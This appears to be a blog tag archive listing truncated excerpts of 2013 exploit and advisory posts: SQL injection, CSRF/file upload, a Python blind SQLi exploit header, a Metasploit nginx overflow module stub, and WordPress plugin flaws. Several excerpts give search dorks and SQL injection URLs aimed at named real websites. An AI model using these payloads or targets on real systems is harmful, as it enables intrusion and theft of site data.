Tags archives: unix

 

0

JavaScript Execution in IBM WebSphere DataPower Services

SEC Consult Vulnerability Lab Security Advisory < 20130523-0 > ======================================================================= title: JavaScript Execution in WebSphere DataPower Services product: IBM WebSphere DataPower Integration Appliance XI50 vulnerable version: 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0 fixed version: not available, config changes CVE number: CVE-2013-0499 impact: Low/Medium homepage: https://www.ibm.com/ found: 2013-01-28 by: A. Falkenberg SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= [...]

 

0

Matterdaddy Market 1.4.2 Cross Site Request Forgery / Arbitrary File Upload

# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0 _ __ __ __ 1 # 1 /’ \ __ /’__`\ /\ \__ /’__`\ 0 # 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 # 1 \/_/\ \ /’ _ `\ \/\ \/_/_\_<_ /’___\ \ \/\ \ \ \ \/\`’__\ 0 # 0 \ [...]

 

0

AVE.CMS 2.09 Blind SQL Injection

#!/usr/bin/env python   import urllib, sys, time   ####################################################################################### # Exploit Title: AVE.CMS <= 2.09 – Remote Blind SQL Injection Exploit # Date: 23/05/2013 # Author: mr.pr0n (@_pr0n_) # Homepage: http://ghostinthelab.wordpress.com/ # Vendor Homepage: http://www.overdoze.ru/ # Software Link: websvn.avecms.ru/listing.php?repname=AVE.cms+2.09 # Version: V2.09 and 2.09RC2 # Tested on: Linux Debian 2.6.32-5-686 # Description: The “module” parameter [...]

 

 

0

Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ##   require ‘msf/core’   class Metasploit4 < Msf::Exploit::Remote   include Exploit::Remote::Tcp   def initialize(info = {}) [...]

 

0

Weyal CMS SQL Injection

================================================ [-] Name: Weyal Cms SQL Injection Vulnerability [-] Vendor: N/A [-] Date: 2013-05-22 [-] Author: XroGuE [-] Home: http://Att4ck3r.ir ================================================ [+] Dork: intext:”Designed by Rohi.af” intext:”Designed by Dr. Weyal” ================================================ [+] Vulnerable Page: fullstory.php?id= , countrys.php?countryid= , “check Another pages :) ”   [+] Vuln: www.[site].com/[path]/fullstory.php?id=SQLi www.[site].com/[path]/countrys.php?id=SQLi   [+] Demo: http://mysurgery.ru/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6 [...]

 

0

Bash - How to sniff traffic on a local UNIX socket

Many high efficency daemons such as MySQL can use UNIX sockets instead of TCP socket to increase communication speed. Basically a UNIX socket is a file on which data goes in and out just like a tcp socket, but normal sniffing softwares such as tcpdump can’t handle those kind of objects.u
To sniff traffic on a local UNIX socket you can use socat as follows.

 

0

WordPress Spider Catalog Multiple Vulnerabilities

Author: Janek Vind “waraxe” Date: 22. May 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-105.html     Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   Spider Catalog is the best WordPress catalog plugin. It is a convenient tool for organizing the products represented on your website into catalogs. Each product on the catalog is assigned with a relevant category, [...]

 

0

WordPress Spider Event Calendar Multiple Vulnerabilities

Author: Janek Vind “waraxe” Date: 22. May 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-104.html     Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   Spider Event Calendar is a highly configurable plugin which allows you to have multiple organized events in a calendar. This plugin is one of the best WordPress Calendar available in WordPress Directory. If you [...]

 

0

WordPress Flagallery-Skins SQL Injection

############## # Exploit Title : Wordpress Flagallery-skins plugin SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # Home : www.ashiyane.org # # Security Risk : Medium # # Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist= # # Tested on: Linux # ############## #Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL] # # #DEm0: # http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27 # # http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27 # # http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27 # [...]